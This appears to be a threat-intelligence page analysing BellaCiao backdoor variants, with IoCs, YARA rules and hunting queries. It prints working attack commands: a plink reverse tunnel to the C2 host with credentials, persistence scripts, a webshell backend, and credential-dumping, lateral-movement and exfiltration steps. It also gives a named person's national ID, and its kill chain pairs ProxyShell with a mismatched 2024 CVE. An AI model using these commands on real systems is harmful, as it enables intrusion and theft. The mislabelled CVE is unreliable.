Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/KittenBusters/CharmingKitten/llms.txt

Use this file to discover all available pages before exploring further.

BellaCiao Technical Analysis

Comprehensive technical analysis of both BellaCiao variants, covering command-and-control protocols, persistence mechanisms, operational security, and defensive strategies.

Executive Summary

BellaCiao is a sophisticated multi-variant backdoor malware developed by CharmingKitten (IRGC-IO Department 40) for persistent access to compromised Microsoft Exchange and IIS web servers. The malware demonstrates advanced operational security, flexible deployment options, and robust C2 mechanisms.

First Seen

2022Deployed against Middle East targets

Confirmed Victims

50+Turkey, UAE, Saudi Arabia, Kuwait, Iran

Attribution Confidence

HighSource code, infrastructure, personnel

Variant Comparison Matrix

CharacteristicVariant 1 (C#)Variant 2 (PowerShell)
LanguageC# (.NET Framework 4.0)PowerShell 5.1+
File TypeCompiled executable (PE32)Script (.ps1)
InstallationWindows ServiceScript execution
PersistenceService auto-startScheduled task / Registry
C2 ProtocolDNS beaconingSSH reverse tunnel
C2 Interval24 hoursPersistent connection
Webshell TypeASP.NET (.aspx)PowerShell HTTP server
Deployment PathIIS wwwroot, Exchange OWALocalhost only
File OperationsUpload, download, executeUpload, download, execute, browse
StealthService masqueradingLegitimate PowerShell
OPSECGood (DNS tunneling)Moderate (SSH on 443)
ModularityLow (monolithic)High (separate components)
Detection DifficultyMediumMedium-High

Command and Control Analysis

Variant 1: DNS-Based C2

Protocol Overview

Variant 1 implements a sophisticated DNS-based command and control protocol: 
[Malware Service] 
    |
    | Every 24 hours
    v
[Generate Random Subdomain]
    |
    | Format: [A-Z]{2}[a-z]{3}EXH
    | Example: ABcdeEXH
    v
[DNS A Record Query]
    |
    | Query: ABcdeEXH.eposta.maill-support.com
    v
[DNS Server Response]
    |
    | A Record: 212.175.168.58
    v
[Decode IP as Command]
    |
    | Octet 1-2: Command type
    | Octet 3: Target system (Exchange vs IIS)
    | Octet 4: Action (deploy vs remove)
    v
[Execute Command]

Command Encoding Scheme

IP Address Structure: 
[First Octet].[Second Octet].[Third Octet].[Fourth Octet]
     |              |              |              |
  Primary        Secondary      System        Action
  Selector       Selector       Type          Type
Octet 1 (Primary Selector):
  • 212: Use predefined filename
  • Other: Use random generated filename
Octet 2 (Secondary Selector):
  • 175: Path type 1 (IIS wwwroot / Exchange themes resources)
  • 176: Path type 2 (IIS wwwroot2 / Exchange themes)
  • 177: Path type 3 (Exchange OWA auth current)
Octet 3 (System Type):
  • 168: Exchange Server target
  • Other: IIS target
Octet 4 (Action):
  • 58: Deploy webshell
  • 59: Remove all webshells

Example Commands

DNS Response: 212.175.168.58Decoded Action:
  • 212: Use predefined name (owafont.aspx)
  • 175: Use path 1 (themes resources)
  • 168: Exchange Server
  • 58: Deploy webshell
Result:
Deploy: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx

C2 Resilience

Domain Failover: 
try {
    // Try primary domain
    query = System.Net.Dns.GetHostEntry(randstr + "EXH" + dnsdomain);
    response = query.AddressList[0].ToString();
}
catch (Exception) {
    // Fallback to secondary domain after 60 second delay
    System.Threading.Thread.Sleep(60 * 1000);
    query = System.Net.Dns.GetHostEntry(randstr + "EXH" + dnsdomain2);
    response = query.AddressList[0].ToString();
}
Benefits of DNS C2:
  • Bypasses many firewall rules (DNS typically allowed)
  • Low network footprint (single query every 24 hours)
  • Difficult to detect without DNS logging
  • No direct connection to C2 server
  • Natural traffic pattern (applications query DNS regularly)

Variant 2: SSH Reverse Tunnel

Tunnel Architecture

[Victim System]              [C2 Server: twittsupport.com]
     |
     | Outbound SSH on port 443
     | Appears as HTTPS traffic
     v
[SSH Server on C2]
     |
     | Reverse tunnel established
     | -R 127.0.0.1:9090:127.0.0.1:49450
     v
[C2 Localhost Port 9090] <--> [Victim Localhost Port 49450]
                                         |
                                         v
                                [PowerShell Webserver]

Tunnel Configuration

Plink Command: 
echo Y | "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe" twittsupport.com -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!
Parameter Analysis:
ParameterValuePurposeOPSEC Impact
echo YAuto-acceptBypass host key warningEnables unattended operation
Targettwittsupport.comC2 domainUses legitimate-looking domain
-P 443SSH port 443Port selectionMimics HTTPS traffic
-CCompressionEnable SSH compressionReduces bandwidth, harder to analyze
-RReverse tunnelForward C2:9090 to victim:49450No inbound firewall rules needed
-l IsraelUsernameSSH authenticationHardcoded credential
-pw Israel@123!PasswordSSH authenticationWeak password, reused across ops
Binary pathJava Update Services.exePlink masqueradingAppears as Java updater

Operator Access Flow

1

Establish tunnel from victim

Victim system initiates outbound SSH connection to C2 server on port 443
2

C2 server opens local port

C2 server opens listening port 9090 on localhost (only accessible to C2 system)
3

Operator connects to localhost

Operator on C2 server browses to http://localhost:9090 in web browser
4

Traffic tunneled to victim

HTTP requests forwarded through SSH tunnel to victim’s port 49450
5

PowerShell webserver responds

PowerShell webserver on victim processes request and returns response through tunnel

Persistence Mechanisms

Variant 1: Windows Service

Installation: 
// Service configuration
ServiceName = "MicrosoftAgentServices"
DisplayName = "Microsoft Agent Services"
Description = "Provides agent services for Microsoft applications"
StartType = Automatic
Account = LocalSystem
Installation Command: 
sc create MicrosoftAgentServices binPath= "C:\Windows\System32\MicrosoftAgentServices.exe" start= auto
sc description MicrosoftAgentServices "Provides agent services for Microsoft applications"
sc start MicrosoftAgentServices
Persistence Benefits:
  • Survives reboots
  • Runs as SYSTEM
  • Appears legitimate (Microsoft in name)
  • Standard Windows management (sc.exe)
Detection: 
# Find service
Get-Service | Where-Object { $_.Name -eq "MicrosoftAgentServices" }

# Check service details
Get-WmiObject Win32_Service | Where-Object { $_.Name -eq "MicrosoftAgentServices" } | Select-Object *

# View service binary path
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\MicrosoftAgentServices").ImagePath

Variant 2: Multiple Options

Scheduled Task Persistence

# Create scheduled task
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -WindowStyle Hidden -File C:\ProgramData\iis.ps1"
$trigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName "Windows Update Service" -Action $action -Trigger $trigger -Principal $principal -Settings $settings

Registry Run Key

# HKLM Run key (all users)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsDefender" -Value "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\ProgramData\iis.ps1"

# HKCU Run key (current user)
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsDefender" -Value "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\ProgramData\iis.ps1"

WMI Event Subscription

# Create WMI event subscription for persistence
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
    Name = "WindowsUpdateFilter"
    EventNamespace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
    Name = "WindowsUpdateConsumer"
    CommandLineTemplate = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\ProgramData\iis.ps1"
}

Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
    Filter = $Filter
    Consumer = $Consumer
}

Webshell Analysis

Variant 1 Webshells

The webshells dropped by Variant 1 are base64-encoded ASP.NET pages. The malware stores them as: 
public string web = "i am good boy"; // Placeholder in source
// Actual deployment contains base64-encoded ASPX webshell
Deployment process: 
byte[] clearWeb = System.Convert.FromBase64String(
    web.Replace("#", "").Replace("@", "")
);
System.IO.File.WriteAllBytes(path, clearWeb);
Typical capabilities:
  • File upload/download
  • Command execution via cmd.exe or powershell.exe
  • Directory browsing
  • Process listing and termination
  • Registry access

Variant 2 Webserver

Variant 2 implements a full PowerShell HTTP server with extensive capabilities:

Web Interface Routes

RouteMethodFunctionRisk Level
/GETCommand execution formCritical
/scriptPOSTUpload and execute PS1 scriptsCritical
/uploadPOSTUpload arbitrary filesHigh
/downloadGET/POSTDownload files from systemHigh
/logGETView webserver access logsMedium
/timeGETGet system timeLow
/starttimeGETView webserver start timeLow
/beepGETSystem beep (presence check)Low
/exit or /quitGETStop webserverMedium
/* (any path)GETBrowse filesystem, download filesHigh

Command Execution Interface

The root path (/) provides a web-based PowerShell prompt: HTML Interface: 
<form method="GET" action="/">
    <b>PS C:\&gt;</b>
    <input type="text" maxlength="255" size="80" name="command" value="whoami">
    <input type="submit" name="button" value="Enter">
</form>
<pre>[Command output displayed here]</pre>
Backend Execution: 
$FORMFIELD = [URI]::UnescapeDataString(($REQUEST.Url.Query -replace "\+"," "))
$FORMFIELD = $FORMFIELD -replace "\?command=","" -replace "\?button=enter","" -replace "&command=","" -replace "&button=enter",""

if (![STRING]::IsNullOrEmpty($FORMFIELD)) {
    try {
        $RESULT = Invoke-Expression -EA SilentlyContinue $FORMFIELD 2> $NULL | Out-String
    }
    catch {
        $RESULT += "`nError while executing '$FORMFIELD'`n`n"
        $RESULT += $Error[0]
        $Error.Clear()
    }
}
Direct use of Invoke-Expression on user input allows arbitrary PowerShell command execution with the privileges of the running script (typically SYSTEM).

Operational Security Analysis

OPSEC Strengths

  1. DNS Tunneling
    • Blends with normal DNS traffic
    • Low frequency (24-hour beacon interval)
    • Minimal network footprint
  2. Legitimate Paths
    • Targets system directories (wwwroot, Exchange)
    • Files named to appear legitimate (aspnet, owafont, themes)
  3. Service Masquerading
    • Service name mimics Microsoft naming convention
    • Runs as LocalSystem (expected for system services)
  4. Command Encoding
    • IP addresses appear as normal DNS responses
    • No obvious command structure in network traffic
  5. Minimal Artifacts
    • Single service binary
    • No registry keys beyond service installation
    • Webshells only created on demand
  1. Reverse Tunnel
    • No inbound connections required
    • Bypasses inbound firewall rules
    • Operator connects through tunnel
  2. Port 443 Mimicry
    • SSH on port 443 appears as HTTPS
    • Blends with legitimate encrypted web traffic
  3. Localhost Binding
    • Webserver only accessible via tunnel
    • No direct network exposure
    • Appears as internal application
  4. PowerShell Native
    • No compiled binaries to analyze
    • Uses built-in Windows functionality
    • Harder to signature-match
  5. Legitimate Tool Abuse
    • Plink is a legitimate SSH client
    • PowerShell is a built-in Windows tool
    • Both have valid administrative uses

OPSEC Weaknesses

  1. Fixed Domain Pattern
    • DNS queries always to *.eposta.maill-support.com or *.eposta.mailupdate.info
    • Easy to block once identified
  2. Predictable Subdomain Format
    • Pattern: [A-Z]{2}[a-z]{3}EXH
    • “EXH” marker makes detection easier
  3. Hardcoded Strings
    • Domain names in binary
    • File paths in binary
    • Service name predictable
  4. Base64 in Memory
    • Webshell payload stored as base64 string
    • Memory scanning can detect
  5. 24-Hour Timer
    • Predictable beacon interval
    • Can correlate with DNS logs
  1. Hardcoded SSH Credentials
    • Username: Israel
    • Password: Israel@123!
    • Same credentials used across all deployments
  2. SSH Protocol Detection
    • Despite port 443, SSH protocol identifiable by DPI
    • SSL/TLS inspection can detect SSH tunneling
  3. Hardcoded C2 Domains
    • twittsupport.com and msn-center.uk
    • Easy to block once identified
  4. Plink Renamed but Detectable
    • File renamed but PE structure unchanged
    • Can be identified by hash or PE headers
  5. PowerShell Script Block Logging
    • If enabled, captures full script execution
    • Webserver source code logged
  6. Localhost Port 49450
    • Fixed port number
    • Easy to monitor for HTTP listener

Credential Reuse Issues

Critical OPSEC Failure: The SSH credentials Israel / Israel@123! are hardcoded and reused across all Variant 2 deployments.
This allows defenders to:
  • Search SSH logs for username “Israel”
  • Identify compromised systems with authentication attempts
  • Track CharmingKitten infrastructure by SSH login patterns
  • Correlate attacks across different targets

Attack Pattern Analysis

Typical Kill Chain

1

Initial Access

ProxyShell Exploitation (CVE-2024-1709)
  • Target: Microsoft Exchange Server
  • Method: ProxyShell vulnerability chain
  • Result: Remote code execution as SYSTEM
2

Persistence - Phase 1

BellaCiao Variant 1 Deployment
  • Deploy as Windows Service
  • Establish DNS beaconing
  • Drop initial webshell to Exchange OWA path
3

Persistence - Phase 2

BellaCiao Variant 2 Deployment
  • Deploy PowerShell script
  • Establish SSH reverse tunnel
  • Start local webserver for operator access
4

Discovery

Network and System Reconnaissance
  • Domain enumeration: net user /domain, nltest
  • Network scanning: nmap, internal IP ranges
  • Credential dumping: SAM/SYSTEM registry hives
5

Lateral Movement

Spread to Additional Systems
  • Use harvested credentials
  • Deploy webshells to other servers
  • Establish persistence on key systems
6

Collection

Data Exfiltration
  • File browser via webserver
  • Compress sensitive data
  • Exfiltrate via webshell or SSH tunnel

Real-World Attack: Turkish Foreign Ministry

Timeline: 
2022-09-15: Initial ProxyShell exploitation
2022-09-15: BellaCiao Variant 1 deployed as Windows Service
2022-09-16: DNS beaconing detected to eposta.maill-support.com
2022-09-16: Webshell dropped to Exchange OWA path
2022-09-17: Network reconnaissance initiated
2022-09-18: Credentials harvested (Admin1@MFA, pfsenselondra@MFA)
2022-09-19: Lateral movement to 10.20.1.5 and 10.20.1.15
2022-09-20: Additional webshells deployed
2022-09-21: Data collection from domain controllers
2022-09-22: Exfiltration via webshell
Commands Executed: 
# Domain reconnaissance
net user /domain
net group "Domain Admins" /domain
nltest /dclist:

# Credential harvesting
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
secretsdump.py

# Lateral movement
net use \\10.20.1.5\c$ /user:Admin1@MFA [password]
copy C:\Tools\shell.aspx \\10.20.1.5\c$\inetpub\wwwroot\aspnet_client\

# Data exfiltration
7z a -p[password] exfil.7z C:\Users\*\Documents
# Upload via webshell
See Episode 3 Intelligence for complete attack analysis.

Indicators of Compromise (IoCs)

File System IoCs

# Variant 1
C:\Windows\System32\MicrosoftAgentServices.exe
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\[A-Z]{2}[a-z]{3}.aspx

# Variant 2
C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
C:\ProgramData\iis.ps1
C:\Windows\Temp\start-webserver.ps1

Network IoCs

# Variant 1 DNS C2
*.eposta.maill-support.com
*.eposta.mailupdate.info
Pattern: [A-Z]{2}[a-z]{3}EXH.<domain>

# Variant 2 SSH Tunnel
twittsupport.com:443
msn-center.uk:443
Username: Israel
Password: Israel@123!

# Webserver
localhost:49450 (Variant 2)

Registry IoCs

HKLM\SYSTEM\CurrentControlSet\Services\MicrosoftAgentServices
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*iis.ps1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*iis.ps1

Process IoCs

Process: MicrosoftAgentServices.exe
Parent: services.exe
User: SYSTEM

Process: powershell.exe
CommandLine: *-ExecutionPolicy Bypass* *iis.ps1*
User: SYSTEM

Process: Java Update Services.exe
CommandLine: *-P 443* *-R 127.0.0.1* *Israel*
Parent: cmd.exe
User: SYSTEM

Detection and Hunting

Hunting Queries

# Hunt for BellaCiao Variant 1 DNS queries
index=dns query IN ("*.eposta.maill-support.com", "*.eposta.mailupdate.info")
| rex field=query "(?<subdomain>[A-Z]{2}[a-z]{3}EXH)"
| where isnotnull(subdomain)
| stats count by src_ip, query, answer

# Hunt for BellaCiao Variant 1 service
index=windows EventCode=7045 Service_Name="MicrosoftAgentServices"
| table _time, ComputerName, Service_File_Name, Account_Name

# Hunt for BellaCiao Variant 2 Plink execution
index=windows EventCode=4688 
(New_Process_Name="*plink.exe" OR New_Process_Name="*Java Update Services.exe")
Process_Command_Line="*-R 127.0.0.1*" Process_Command_Line="*-P 443*"
| table _time, ComputerName, Account_Name, Process_Command_Line

# Hunt for PowerShell webserver
index=windows EventCode=4104 
ScriptBlockText="*System.Net.HttpListener*" ScriptBlockText="*Invoke-Expression*"
| table _time, ComputerName, ScriptBlockText

YARA Rules

rule BellaCiao_Variant1_Service {
    meta:
        description = "Detects BellaCiao Variant 1 Windows Service"
        author = "CharmingKitten Exposure Project"
        date = "2025-01-01"
        hash = "Sample hash from leaked source"
    
    strings:
        $dns1 = ".eposta.maill-support.com" ascii wide
        $dns2 = ".eposta.mailupdate.info" ascii wide
        $service = "MicrosoftAgentServices" ascii wide
        $path1 = "C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
        $path2 = "Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current" ascii wide
        $timer = { 24 * 3600 * 1000 } // 24 hour timer
    
    condition:
        uint16(0) == 0x5A4D and // PE file
        filesize < 500KB and
        2 of ($dns*) and
        ($service or 1 of ($path*))
}

rule BellaCiao_Variant2_PowerShell {
    meta:
        description = "Detects BellaCiao Variant 2 PowerShell script"
        author = "CharmingKitten Exposure Project"
        date = "2025-01-01"
    
    strings:
        $domain1 = "twittsupport.com" ascii
        $domain2 = "msn-center.uk" ascii
        $plink = "Java Update Services.exe" ascii
        $tunnel = "-R 127.0.0.1:9090:127.0.0.1:49450" ascii
        $creds = "-l Israel -pw Israel@123!" ascii
        $webserver = "System.Net.HttpListener" ascii
        $binding = "http://127.0.0.1:49450/" ascii
        $invoke = "Invoke-Expression" ascii
    
    condition:
        filesize < 1MB and
        (1 of ($domain*)) and
        ($plink or $tunnel or $creds) and
        ($webserver or $binding) and
        $invoke
}

Defensive Recommendations

Prevention

  • ProxyShell vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
  • Related CVEs: CVE-2024-1709 (observed in attack reports)
  • Update Microsoft Exchange to latest security patches
  • Implement virtual patching if immediate patching not possible
  • Isolate Exchange servers from general network
  • Restrict outbound connections from Exchange to only required destinations
  • Block SSH outbound except from authorized jump hosts
  • Implement DNS filtering to block known malicious domains
  • Implement AppLocker or Windows Defender Application Control (WDAC)
  • Block unsigned or untrusted binaries
  • Restrict PowerShell execution to signed scripts only
  • Block plink.exe and other SSH clients on Exchange servers
  • Enable PowerShell Constrained Language Mode on servers
  • Implement Just Enough Administration (JEA)
  • Configure PowerShell Script Block Logging
  • Configure PowerShell Module Logging
  • Configure PowerShell Transcription
  • Restrict Invoke-Expression usage

Detection

1

Enable comprehensive logging

  • Windows Security Event Logging (4688, 4689 with command line)
  • PowerShell logging (4104 script block logging)
  • DNS query logging
  • IIS/Exchange request logging
  • Service installation logging (7045)
2

Deploy detection rules

  • Sigma rules for BellaCiao IoCs
  • YARA rules for file scanning
  • Network IDS rules for DNS patterns and SSH tunnels
  • EDR behavioral detections
3

Monitor for specific indicators

  • DNS queries to *.eposta.maill-support.com or *.eposta.mailupdate.info
  • Service installations with “Microsoft” in name from non-Microsoft paths
  • SSH connections outbound to port 443
  • PowerShell HttpListener instantiation
  • Localhost HTTP servers on unusual ports
  • ASPX files in Exchange OWA authentication paths
4

Implement behavioral detection

  • Unusual service installations
  • Long-running PowerShell processes
  • Outbound connections from system services
  • File writes to wwwroot or Exchange paths
  • Registry modifications for persistence

Response

If BellaCiao infection is confirmed:
1

Contain the infection

  • Isolate affected system from network
  • Block C2 domains at firewall and DNS
  • Disable affected services
  • Kill malicious processes
2

Preserve evidence

  • Take memory dump
  • Export relevant logs
  • Image disk for forensic analysis
  • Document all actions taken
3

Eradicate malware

  • Stop and delete malicious services
  • Remove persistence mechanisms
  • Delete webshells and malware files
  • Check for additional persistence
4

Recover and harden

  • Reset all potentially compromised credentials
  • Rebuild system if complete eradication uncertain
  • Apply security patches
  • Implement additional hardening measures
5

Hunt for additional compromises

  • Search for IoCs across all systems
  • Review authentication logs for suspicious activity
  • Check for lateral movement
  • Identify exfiltrated data

Attribution and Context

CharmingKitten (also known as APT35, Phosphorus, NewsBeef, Newscaster) is an Iranian threat actor group operating under the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO). Department 40 operates under the Counterintelligence Division (Unit 1500) of IRGC-IO. Leadership: Abbas Rahrovi (National ID: 4270844116) See:

Additional Resources

Variant 1 Analysis

Deep dive into C# webshell dropper

Variant 2 Analysis

PowerShell reverse proxy analysis

Infrastructure

C2 infrastructure and credentials

Episode 3

Source code release episode